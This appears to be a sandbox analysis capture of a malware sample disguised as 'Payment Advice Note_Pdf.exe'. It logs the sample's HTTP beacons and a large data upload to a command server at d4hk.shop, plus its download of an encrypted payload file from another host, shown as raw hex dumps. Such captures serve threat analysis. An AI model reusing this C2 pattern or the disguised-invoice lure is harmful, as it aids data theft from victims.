Sep 30, 2024 15:10:11.728621006 CEST	269	OUT	POST /MI341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: d4hk.shop Content-Length: 107 Cache-Control: no-cache Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Sep 30, 2024 15:10:13.090967894 CEST	1289	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:10:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: Accept-Encoding,User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcQEgFRgZJJMSLEN%2BoIJwc%2FrUfwxdhDiVgQfkqhlydmDh4D41%2BbTOorq7SXJpsaCeF7w4XX7k%2BiwY17XnNjiTTaCCG4AfdoFLFFiTRH9v9bQIahAJ5RTtev0i3U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb473a3ca5f67d4-MIA Data Raw: 34 34 35 62 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 7b 18 ea 4a 20 e3 57 1c 9b 4f 3f eb 32 18 c7 37 2c e3 69 18 98 54 3e eb 4d 16 c9 3e 68 92 2c 36 90 3f 3b 90 aa 40 f7 2f f0 b8 1e 23 0f 08 48 cc a4 42 fb 2f fe a4 5d 27 09 0a 00 82 a7 01 b3 33 b0 fb 1d 30 0a 0a 5f e2 91 a0 9e 01 9d cb 33 50 66 66 65 50 34 30 9e ba 9d cb 33 54 66 66 65 ef cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 17 cb 30 9e 0c 82 71 3d 54 d2 6f a8 8e 73 31 d2 cf bc 9f 5b 3d 15 46 15 dd a4 57 [TRUNCATED] Data Ascii: 445b?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP{J WO?27,iT>M>h,6?;@/#HB/]'30_3PffeP403Tffe03Tffe03Tffe03Tffe0q=Tos1[=FWcP5R"]tEcoVzkko03m0UjCU2UQjCW0UR3gde.q23TffeO29T`fe03Tffe03Tffu03^ffe03Tffe03X,fep3Tvfe 3Tffe03efe03TFfe_03Tffe0:3Tffe03ffe03Tffe03Tffe03Tffe03Tffe03Tffe03TffeUv3
Sep 30, 2024 15:10:13.090985060 CEST	1289	IN	Data Raw: 7f 62 66 65 af db 30 9e 02 9b cb 33 54 64 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 8f cb 30 fe 2c ef b8 41 37 66 66 65 5f c8 30 9e 02 bd cb 33 54 62 66 65 af c3 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 42 9d cb 73 54 66 66 65 2e 71 12 32 02 9d Data Ascii: bfe03Tdfe03Tffe0,A7ffe_03Tbfe03Tffe0BsTffe.q23Vffe0V3dfe0'Tffe0f3vfe?03D03Tffe035"6]=>^hTk35HkP;H^m8WKTf3Tffe0V3z0V3ff
Sep 30, 2024 15:10:13.091002941 CEST	1289	IN	Data Raw: cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 Data Ascii: 03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe0
Sep 30, 2024 15:10:13.091013908 CEST	1289	IN	Data Raw: b8 33 38 66 07 65 db cb 59 9e 6d 9d a5 33 54 66 66 65 a6 cf 80 9a 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 97 f6 30 9e 02 9f c9 33 64 e4 5b 40 a9 c2 1a 18 4a 1b 3c 3e 55 61 64 c5 2d f6 26 ae Data Ascii: 38feYm3Tffe3Tffe03Tffe03Tffe03d[@J<>Uad-&1UgWn6)1NcfU:2Qddk>5^M`d]egedo``37@lLR?^_027=I&Vam=1Uddv031+s0Y`oO)i6QfV7R
Sep 30, 2024 15:10:13.091026068 CEST	1289	IN	Data Raw: d9 e5 0d d7 a1 3f 3d cf 09 4c 47 87 81 62 6f a9 94 87 6b 31 1e ca 49 f7 6e 72 14 23 8f 77 77 e1 0a a5 e1 fa 21 de 18 c3 98 e7 fa 7c 46 1c dd a2 c6 f6 17 82 60 eb ce 07 2f ea eb 77 2e de f7 af 87 0b 28 3d 5a 0a cb 01 55 d2 96 8b 4b 67 06 4e 09 34 Data Ascii: ?=LGbok1Inr#ww!\|F`/w.(=ZUKgN4bK,Xv,F*(VJ%PbU->1VuUeHX(9e0z5]L-)<=3dWn6W V35T!;Gl1Ye]evVkea120blvYp\2F&
Sep 30, 2024 15:10:13.091037035 CEST	1289	IN	Data Raw: c0 76 28 dc db 9f 9c eb 6b 4e 0e a2 e2 55 6b 2c 76 ea 4f 25 04 c7 3a 22 bb d1 f6 9e be f0 d5 22 18 29 c0 e7 31 b3 25 68 92 6d 92 25 78 07 24 51 37 5d b1 ba fa 01 2b be 3a 87 0e f0 41 3f 9d 36 da f5 e2 d1 eb 15 f4 03 6c 6e 47 a6 28 e7 b9 9b b4 ac Data Ascii: v(kNUk,vO%:"")1%hm%x$Q7]+:A?6lnG(k+Vw9k0Vgdg3TfWU9MYgg`3"RloBl.*Be):@]T^=V3Re3ak\'_vV&QgF IdV^V;
Sep 30, 2024 15:10:13.091048002 CEST	1289	IN	Data Raw: f0 7e 39 66 fe 26 c1 df 0e d6 7a da 4b d8 c8 9b 8f 2c 70 12 88 d1 33 09 bb 53 3e 8e 05 a8 59 0b 73 4e 3d d8 29 0b 6b bc 85 0d e2 2b d5 57 41 85 95 0a af 6e 27 40 3d 55 0f 9c 4e c0 eb c6 7e e7 c8 6a 69 cd 3e ac 39 20 c3 50 88 82 e4 27 56 e4 ef fc Data Ascii: ~9f&zK,p3S>YsN=)k+WAn'@=UN~ji>9 P'V!YI%1xhruq4*fK0#B0/#Pg}$+BxF:9zT)>xj!vSQG:De=miiipYY!WJ5?JM6!
Sep 30, 2024 15:10:13.091121912 CEST	1289	IN	Data Raw: 3d 98 0b b7 4d 7b d2 91 6b 64 ae ce 35 9e 01 1f c9 32 54 76 f1 ef 6c 97 33 da 34 40 22 87 f9 11 bd ab d6 9a 7d 9f b3 b3 bf 42 0f 0b 6a 76 04 05 8e e5 8d 25 e5 e7 46 c4 ea 08 cd 73 67 9c c9 d3 eb 20 04 ff bb 1f ef 29 67 25 ad c5 51 2f b5 7b 67 e3 Data Ascii: =M{kd52Tvl34@"}Bjv%Fsg )g%Q/{gpHlM'U 5V)s*YyvS/H,<4}V^_aBE)70dWX;VlumQJs$(j" )m${B,:>:O'Z-
Sep 30, 2024 15:10:13.091166019 CEST	1289	IN	Data Raw: 5a 3a 01 12 0a c1 fa 20 ae 0c 9b c8 66 50 61 75 62 fd ae 54 f3 6d f3 af 02 4a 56 7a 63 ac 9e 34 94 11 88 86 5a 37 14 09 16 c0 ad 44 be 41 f2 b9 43 3b 14 07 11 c6 a4 5e af 23 ad d4 35 57 33 62 66 bc d3 7d f7 61 ef a4 40 3b 00 12 45 fb a2 5d fb 2f Data Ascii: Z: fPaubTmJVzc4Z7DAC;^#5W3bf}a@;E]/R9F5213ogp}43TfU5)Qf86(kgl;M{kdh5cV_W3idE`lMx:PWpam+LU-S"DVkcj2UcceI1m%Z4
Sep 30, 2024 15:10:13.091269016 CEST	1289	IN	Data Raw: ae 68 b2 9f 78 ad 49 32 22 56 79 63 ac 9e 2d bb 06 85 fb 25 52 6c 4d 63 ae cf 31 1c 35 a0 cd 32 52 6e 4d 63 ae ce 35 99 01 9e fb 2e 52 65 33 78 a1 cf 26 9a 16 bb ff 2d 9e e9 94 11 a5 45 d2 cd 2f b2 d8 19 67 71 35 3e 2b fb 61 98 01 c8 d6 22 50 2c Data Ascii: hxI2"Vyc-%RlMc152RnMc5.Re3x&-E/gq5>+a"P,V-39Re3a3MdT`f5)lPSNR0yT\gQfWH5W`ST6W7LVp-y&3+?!-V0c-~d-,jCnIIk\'_-Z{B
Sep 30, 2024 15:10:13.091283083 CEST	1289	IN	Data Raw: 9c cb 32 f7 e4 67 86 9f 49 31 41 32 8d cd 3a 7f 60 67 61 ae 49 07 8b 03 99 c8 31 55 66 56 78 a9 c8 65 83 0c 99 dd 37 40 80 9a 3a d4 70 12 9e 5a 79 b9 7d e1 92 47 11 8c f9 d6 71 ae ad d2 35 5d 4d 60 64 ab ca b2 a9 16 9f cf 3f 4a 6c 66 36 af be 30 Data Ascii: 2gI1A2:`gaI1UfVxe7@:pZy}Gq5]M`d?Jlf60rdm`f?2Vic-47QVed4.wb~UK$K:~U3\|d+V.G \JB,P&mC?IpF7JSmV&'2yTUK\X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49755	172.67.215.93	80	7280	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:10:16.933418989 CEST	164	OUT	POST /MI341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: d4hk.shop Content-Length: 43514 Cache-Control: no-cache
Sep 30, 2024 15:10:16.933468103 CEST	3867	OUT	Data Raw: 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5&f&f&g&fm1t&1e0d0e1em!q%j&-0c0a&f&f&f&f&f&fw=q)0d&fp3)0f0gF)1Bm@4`@x1l.aA7b@cGc:;a
Sep 30, 2024 15:10:16.933516026 CEST	5156	OUT	Data Raw: 52 1d ed 51 1d e5 41 1f f4 52 04 f6 45 0c fa 4d 17 e6 46 1f eb 54 07 fe 59 07 f6 59 16 f6 51 1f ff 55 1c fb 4c 14 fa 49 14 eb 5a 11 e7 4f 07 eb 51 10 ea 4a 02 e8 46 18 e7 50 10 e5 59 02 e0 40 11 fa 4a 05 fa 57 1a f4 5b 1a f4 49 1c f7 4e 12 e5 5a Data Ascii: RQAREMFTYYQULIZOQJFPY@JW[INZ[VTKIDJGWYFNBPGZSA[WFA@QWF[K[VQRTDPZRHBIV@MHQZGKDBSLM
Sep 30, 2024 15:10:16.933564901 CEST	2578	OUT	Data Raw: e8 4f 13 f4 42 19 fe 4e 1a f6 45 1e e8 42 14 e8 52 0c ff 49 06 ec 5a 07 e2 5b 06 f7 54 1c e2 48 17 f9 4d 1b e5 4d 05 fa 5b 11 e8 4b 13 ed 41 01 fb 46 02 f7 56 12 eb 4e 17 f4 4e 10 e8 4b 1b e3 41 11 fc 46 19 ff 46 0c e8 48 1c e8 42 07 ea 54 0f e1 Data Ascii: OBNEBRIZ[THMM[KAFVNNKAFFHBTGTAPBYEHJRPYDYS[LIMSMYWBSYSAWTULPQVKJERJKZZPMVUZFBOUFA
Sep 30, 2024 15:10:17.083375931 CEST	1289	OUT	Data Raw: 51 17 ea 46 17 f6 52 02 fd 47 1d fb 45 17 f9 4a 07 fe 4d 1a e1 46 1b fa 54 02 e8 51 1c ec 4f 0f ec 4e 14 e8 57 18 f4 53 19 e8 4f 19 f8 48 01 e9 4e 00 f6 4d 1e e2 51 13 e0 5a 19 eb 45 1b e5 49 02 fe 54 1b e2 42 1b f9 41 07 ea 42 06 e8 51 11 e4 56 Data Ascii: QFRGEJMFTQONWSOHNMQZEITBABQVUKARNNOTNN@JQOLQ@[WBHAU[AVJXSAUUUxQWUUE<f&2NGR_BGJ{9{BGJD
Sep 30, 2024 15:10:17.083425999 CEST	2578	OUT	Data Raw: dd 5f 64 f2 56 18 e3 41 11 e0 46 04 ec 4d 09 fb 4e 18 ec 47 1b eb 52 17 e0 2d 31 c1 60 2d fb 4e 18 ec 47 1b eb 52 17 e0 55 1c e3 41 1b e9 4b 0c f4 40 17 e5 5b 02 e3 52 1f e5 5a 1c fd 57 14 e0 50 07 e0 45 0d f6 41 1e ef 4f 1c e7 46 18 eb 54 14 e8 Data Ascii: _dVAFMNGR-1`-NGRUAK@[RZWPEAOFTRWY[NDTZTZJQUSYWQDKFVYRMBEVBS[LYNTJHZTVYFRGSLSVTYPUUDE
Sep 30, 2024 15:10:17.083647966 CEST	5156	OUT	Data Raw: 46 1f f7 59 00 e2 51 1b e9 42 13 e5 47 04 f6 46 0c e6 4e 1f f9 42 0f f6 40 01 fd 4f 1a e7 47 06 f8 54 16 ea 47 14 e4 55 04 e1 59 07 f6 54 03 f9 40 18 f7 52 16 e5 5b 07 ff 4e 1a e6 55 16 e3 49 1d f6 46 07 ff 57 18 ec 44 07 eb 57 1d e5 41 1c ff 56 Data Ascii: FYQBGFNB@OGTGUYT@R[NUIFWDWAVSBDGFKWVDDVMYULEYGRAMSPEFIHPEAGROWKBYIPHATYFLUAWKUNMA
Sep 30, 2024 15:10:17.083815098 CEST	7734	OUT	Data Raw: ef 49 18 f9 55 04 ea 4b 03 fd 4e 0c e6 53 0d e8 44 1b e1 56 07 ec 41 1c f8 55 03 e3 51 05 f9 41 17 e2 52 0d fb 40 14 f6 56 13 ef 5a 07 fd 57 16 e5 54 0d ef 42 18 e5 49 1f f4 4a 19 f8 5a 0f e0 41 05 fd 4e 0d ef 44 0d f4 47 14 fd 45 03 e9 48 17 fa Data Ascii: IUKNSDVAUQAR@VZWTBIJZANDGEHKFRSUU@GFMKRLYFJBMKYNNHQBKTWHNJ[MOOEKDGAJEEBVOVNHPHDDA
Sep 30, 2024 15:10:17.084203959 CEST	7734	OUT	Data Raw: f4 47 1d fc 45 16 ec 53 17 e7 49 07 ef 42 19 e9 56 18 ed 59 0d fd 50 07 e5 54 02 fa 4f 02 fc 40 14 e9 4e 17 e5 4f 04 ef 57 18 eb 4f 1a fc 45 11 fc 45 1a fe 4e 0d f7 59 00 f9 55 11 eb 40 00 ec 45 1e e4 5a 12 ef 55 1b fe 4a 0f e6 49 14 ed 55 05 fd Data Ascii: GESIBVYPTO@NOWOEENYU@EZUJIUMZYDDKQOZQKHNVUREZPY@IBBDDZHFEBEBS@@BGPUTQELEMSPI@UWIT
Sep 30, 2024 15:10:17.233397961 CEST	1289	OUT	Data Raw: 9e 48 75 ed 53 00 8e 43 75 9d 2d 63 9e 44 1d d4 0e 5f ed 53 00 8e 40 3a db 6d 21 94 23 64 98 0e 5f e9 66 21 fc 42 18 94 23 64 9b 3a 65 9e 0e 5f f8 6a 31 cb 6c 75 e7 6d 33 c1 0e 5f e7 6d 21 cb 6f 7d fc 2a 75 fb 4b 11 8e 44 27 cf 73 3d c7 60 26 8e Data Ascii: HuSCu-cD_S@:m!#d_f!B#d:e_j1lum3_m!o}uKD's=`&5f_m!o}uKD's=`&5f_m!o}*uKD's=`&5f_X_P,w0#l6p&_P,w0_d<w'_&p&f-_n:zul8q0p<mX`&p&f-_j;m<-0fX
Sep 30, 2024 15:10:17.233448982 CEST	3867	OUT	Data Raw: 1a c0 66 14 de 73 7b e7 44 16 ed 2d 02 c7 6d 06 cb 71 23 c7 60 30 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 1a c8 65 3c cd 66 16 c2 6a 36 c5 57 3a fc 76 3b 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f Data Ascii: fs{D-mq#`0f-_&`=p!f-_e<fj6W:v;f-_&`=p!f-_?jf'j6-0fX\u6l&-0fX\u6l&-0fX\u6l&-0fX\u6l&-0fX\q0f;b!l;l;@4k0f-_&`=p!f-_&`=p!f-_&`=p!f-_\w3l
Sep 30, 2024 15:10:20.387989044 CEST	592	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:10:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Nzy4JSifSpk3EroncQUFK0Kh2tRCrPHdOawrS8iGW8FLYGaSELwvQBzEh5SELG0nS%2BcTAkFsoxi2Wj9rg%2F871k5tjutkPP%2FxZLM0IQSLN1528PJv1rsuufxobk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb473c45802d9d1-MIA Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a Data Ascii: 7falseOK

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49753	172.93.121.126	443	7280	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:10:10 UTC	176	OUT	GET /Hpgcc91.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: uktnl.vantechdns.com Cache-Control: no-cache
2024-09-30 13:10:10 UTC	223	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:09:56 GMT Server: Apache Last-Modified: Mon, 30 Sep 2024 10:01:57 GMT Accept-Ranges: bytes Content-Length: 114752 Connection: close Content-Type: application/octet-stream
2024-09-30 13:10:10 UTC	7969	IN	Data Raw: fd b7 4a 64 c3 40 ec 01 5b 83 25 dd 5d d1 be 5d cb 00 44 2f d3 ef f7 e9 3b e2 89 2f e8 66 13 83 53 74 5e 2d 86 dc ed 51 5d 1e 73 60 6a 2c e2 9a c0 5f 79 61 9e 13 d4 d5 65 fb 24 65 1e 6d 79 08 fc 40 73 8b 4a 9d 55 f9 c5 c3 c1 96 05 ea 56 b2 f9 ac 3e 97 8d 4c e8 cd fa b1 cb 80 6e 98 65 38 90 2f a8 2e 04 3b 75 0e 38 95 9b 7f 3a 54 ea eb 1c 8a 70 3f 01 37 fc a8 09 46 ff 5e 82 22 e4 81 dc 11 4f 0a c7 d0 0a 7c 7b 04 96 46 13 3b 8f 29 85 07 bd 24 df 55 e5 6f c1 21 06 fe 84 84 ad b6 f4 85 fd c2 ed 7b 4f f4 91 bb 9d 95 d9 1b 99 fe ec 5b 43 12 5a 47 b6 e8 94 5f ca 34 22 60 fa 9d 9a 01 28 79 2b d2 5f db a4 2f 8a 89 04 97 60 8f 98 6d cb f3 c9 f0 88 a8 19 d6 ef 4c f6 e0 47 13 52 d2 dc 04 e9 c0 ff 32 9e e3 37 9f e1 22 64 5a c8 f7 76 9e 6e 5e 92 be 48 d6 73 08 c1 7e 4a Data Ascii: Jd@[%]]D/;/fSt^-Q]s`j,_yae$emy@sJUV>Lne8/.;u8:Tp?7F^"O\|{F;)$Uo!{O[CZG_4"`(y+_/`mLGR27"dZvn^Hs~J
2024-09-30 13:10:10 UTC	8000	IN	Data Raw: 08 f8 9d 9a 81 c0 3c cd 2d a0 5e 64 5a c7 ba c4 c2 08 ba b3 2d cb 97 36 c0 ec 21 39 11 aa b8 f2 e0 47 13 df 97 28 54 64 85 07 62 f4 e3 5d 9f 89 5a 4f 1a c8 7c 33 62 3e b6 88 58 b7 29 40 c8 9b 27 13 72 de 89 47 65 fb a4 c2 88 99 a3 ce ba 41 e8 6a 48 1c 88 bc 4c d5 51 58 bd c9 97 e9 ba 78 c9 15 ce dc 3e 70 98 65 62 c6 57 a9 1c b7 83 21 7a 8d 3c 23 20 ba bd f4 2e 54 1b 6f 01 74 e2 c4 4b e2 b3 02 f3 f3 e8 51 1d 8d eb 8f c0 ba b8 4e bd 58 69 d3 03 6b 66 a9 9c 5d a7 c9 6e 9c 81 dc 49 72 42 9b 32 fc 8a 89 52 ee 70 66 8b c5 53 70 1e c1 1c b4 0d 8d 9e a1 11 90 7a d6 fb 3d 61 4f 88 8b 75 b7 ba 61 80 28 47 3d d4 e7 d2 a5 e1 07 4e 4c 78 cd 4d 04 e3 be dd 04 a5 72 8c 19 75 7c c6 e5 49 29 79 2a 32 10 ba 11 d3 85 f7 d8 e9 3c d8 4a 27 a7 99 f7 08 08 ba f2 9a 3b 1d be e9 Data Ascii: <-^dZ-6!9G(Tdb]ZO\|3b>X)@'rGeAjHLQXx>pebW!z<# .TotKQNXikf]nIrB2RpfSpz=aOua(G=NLxMru\|I)y*2<J';
2024-09-30 13:10:10 UTC	8000	IN	Data Raw: 38 ad 82 f0 80 ad 9c 52 b6 45 ad 58 38 19 e9 7e 53 a6 60 45 e3 bd cf b3 ee f6 4e ca 2e bd d8 db 0c 5c 64 b5 06 cb c3 60 c0 48 79 60 4e a2 b9 5a e1 cd b0 50 f6 eb 55 37 96 00 b4 df 0f 40 a0 cc 4a 35 b7 6b fc 04 65 32 fc 90 b5 63 a1 0b a3 58 fe 49 6a 29 21 6a 7a e9 74 76 8c 30 87 85 4b f7 39 25 a0 a3 5a ae 21 cd 6f 5f f3 1f ce d5 23 61 b7 b4 0b 58 f8 3f 4a 69 39 9a 41 9e d3 1d f2 7a aa f5 24 79 62 e7 31 95 07 27 55 32 f1 af a4 dd 88 ea 42 ff 6b d4 f1 75 86 c2 fe 97 78 4d a7 9b 46 8d d8 48 8b 27 ed 9b 17 d6 08 a2 c9 05 c5 ae 9f c1 1f 01 a2 0b b4 00 a5 21 bd 2c 2e 75 ac a3 97 7b b0 36 c1 90 d2 12 a9 a7 dd 10 5c a8 b5 9c f6 66 0b f1 b5 08 ca 05 21 0d 4a e3 46 a0 3d 51 99 fe 44 ef 22 d7 58 12 60 2f f4 cf 9a b6 91 fc 48 14 29 6c 62 ba 57 01 3f 4b b9 85 12 80 a8 Data Ascii: 8REX8~S`EN.\d`Hy`NZPU7@J5ke2cXIj)!jztv0K9%Z!o_#aX?Ji9Az$yb1'U2BkuxMFH'!,.u{6\f!JF=QD"X`/H)lbW?K
2024-09-30 13:10:10 UTC	8000	IN	Data Raw: 46 4c a8 81 09 41 da db 56 f0 80 39 5f 47 a3 84 de b6 f5 88 3d 88 2b 19 13 17 5a 51 13 5c ef fc 08 22 e0 57 b3 a6 ec 9e 91 f9 fc e2 ae ac e0 c8 05 77 9d 12 6c 03 b2 97 ee 46 a6 22 b9 38 fc 32 10 c4 7d 66 3b 10 35 4e e7 81 35 6a 53 5a 4e c1 dc ed b7 c3 14 0c 57 bb d3 5d 88 25 b6 8c a6 3b 47 48 40 34 07 b3 f6 64 64 52 fe e8 cd 94 0a 74 ef 11 3a 27 89 fb 4c 01 02 d1 8d d5 99 af a1 21 63 bf 80 16 a8 c6 f2 91 6b 3e cf 20 d9 71 61 fb 5a 14 7f 37 50 1d 51 5a ed 57 a9 a2 63 2a f0 a4 91 b5 f6 98 15 a2 c1 84 5e c7 7e 08 e2 2c 0c 96 d9 97 91 fb cd 63 f1 e3 84 87 9c e7 47 ce 7a 93 4e aa 05 df 56 aa 6d e2 82 db 77 b0 43 36 b8 54 39 3e f3 95 cd 1f 57 94 d5 9c 0c 06 26 5c 61 b2 36 89 86 94 24 83 99 25 87 e4 c6 fd 8e 94 33 1e 00 7a a1 ee c3 c6 8e 37 b7 fa 27 fa c7 76 1d Data Ascii: FLAV9_G=+ZQ\"WwlF"82}f;5N5jSZNW]%;GH@4ddRt:'L!ck> qaZ7PQZWc*^~,cGzNVmwC6T9>W&\a6$%3z7'v
2024-09-30 13:10:10 UTC	8000	IN	Data Raw: d9 d7 d7 b2 40 c4 04 3d af 38 e5 2c 0b 1b b4 f3 47 81 47 a4 75 c4 cc 9a 38 38 05 72 a7 4b d6 f1 76 86 2d 54 3e e3 e9 63 26 0b da 97 f1 d4 b0 77 2e a4 a9 71 a0 4e 0b db 18 0a c9 22 c6 1a d7 ea 77 c9 0b 79 fd e2 6e 71 82 7f e4 e8 a6 91 e9 25 f1 cb 50 e1 27 c4 bb 37 fd 02 cd 93 12 bf e1 d4 14 02 93 b2 2d 4e 09 d8 c6 e9 a5 6c 04 cc 2d 76 35 f2 19 74 0b 6f d1 fd 7a 8b 8c 10 f8 6a a3 08 ba 6d 61 d0 38 1a 4f 95 75 2c 83 f3 98 5b d3 45 39 88 9b 3d f5 1e 6f b7 b2 42 90 87 13 dc e4 ad a9 8b 23 4a 5b d0 ee 74 bd cc 44 6b 97 c4 04 46 83 20 20 19 c9 a2 be 6e 07 8c 93 05 39 0e ea cd bb 46 47 c0 15 61 65 d9 e3 15 72 c6 2c 8b 92 c3 ab 24 b4 77 6b b2 e7 c6 47 0b 43 cb 91 d8 80 00 32 43 4a f7 9f d7 70 ee 7b de 0f 5f d2 33 dc de fe 13 5e b0 f4 66 2d e0 58 7a 95 49 fe 64 99 Data Ascii: @=8,GGu88rKv-T>c&w.qN"wynq%P'7-Nl-v5tozjma8Ou,[E9=oB#J[tDkF n9FGaer,$wkGC2CJp{_3^f-XzId
2024-09-30 13:10:11 UTC	8000	IN	Data Raw: 6e 08 ea 2e b9 28 b6 a7 3e cf c6 ad 7b 55 0f 8e 02 b8 99 2c b6 96 9e 90 c9 26 a4 ab b4 49 6a e7 bb c4 9b 85 55 ea 5b 16 89 37 06 c6 e4 56 88 7d c9 39 a0 7a 14 20 3c 3a 19 b0 6d 45 ea 6b bd 75 fc 6f 91 ae 80 9e d5 72 a7 2e a9 91 1a fc 58 d5 0b 40 c5 56 b5 6b c7 3a ab fa 15 fb a6 cd 59 a0 1c 60 1e 34 cb c2 d4 74 5d 66 ab b7 2b 6d 56 37 7e 19 20 6f dc d3 21 a1 d1 ba a5 49 5f 49 47 b2 d3 3b 46 7b 8f 98 29 53 89 32 49 a4 04 d2 53 2a 11 c6 ea 0e 36 52 a7 be fc 21 46 af a8 40 d6 5e 5b 5d b0 14 aa db b1 ff a4 cd c1 69 b8 89 6d a0 64 90 f0 cf 0d 94 1a 90 b0 97 6c c0 fe c8 ec 6e 6a a4 2f 52 07 d4 79 7c 96 50 db d0 10 33 ba 70 79 ca 72 f5 f2 b0 d4 dd 90 b3 53 8f 5c 8a 60 42 46 c3 cb 28 49 a3 62 63 26 9d c0 0c 47 e6 01 8e 2a f0 7c 79 a8 47 25 58 5d 6d 27 ad fb 75 96 Data Ascii: n.(>{U,&IjU[7V}9z <:mEkuor.X@Vk:Y`4t]f+mV7~ o!I_IG;F{)S2IS6R!F@^[]imdlnj/Ry\|P3pyrS\`BF(Ibc&G\|yG%X]m'u
2024-09-30 13:10:11 UTC	8000	IN	Data Raw: 25 61 0a e7 b9 b5 44 81 46 50 b9 15 ff 3c 1c 20 fc 3d 8e 03 e3 f0 a9 4f 57 66 77 12 65 04 ad 57 f2 cc 06 bd 5b 43 28 c1 da f5 b6 30 f5 6d 88 05 7c b2 93 3d 75 ed e5 b7 3a 8c 41 9b b2 7a f0 38 c2 44 e8 d0 7f 44 40 2c aa 6d a0 8e 47 cb d5 61 0a a2 5a dd ec 89 fe b8 ab a6 cd c4 ec 65 b9 f3 3a 9c 16 14 ad 55 a8 66 e3 05 51 08 48 fe 28 eb fb 07 80 0e 27 8d bd 24 4b 9b 4a d7 b2 71 cf e7 0b b9 75 b5 e4 4b 43 9b 41 53 10 a6 b1 41 0f cf d3 dc eb f0 6a 4c fc 7d f0 99 a9 89 b5 25 9a 52 75 71 33 b9 40 88 e7 79 4b 56 9f 87 17 d4 8a 99 8c 65 d2 33 c6 db 02 54 0e 53 50 1f a4 e1 51 44 c1 90 06 46 a4 e7 33 ae 43 60 59 4c 03 23 ab 0a 91 c1 74 c4 b5 69 27 f8 d0 5c 3b 5d f6 9c d0 9f 59 90 6f 5f 30 09 7c 60 1a 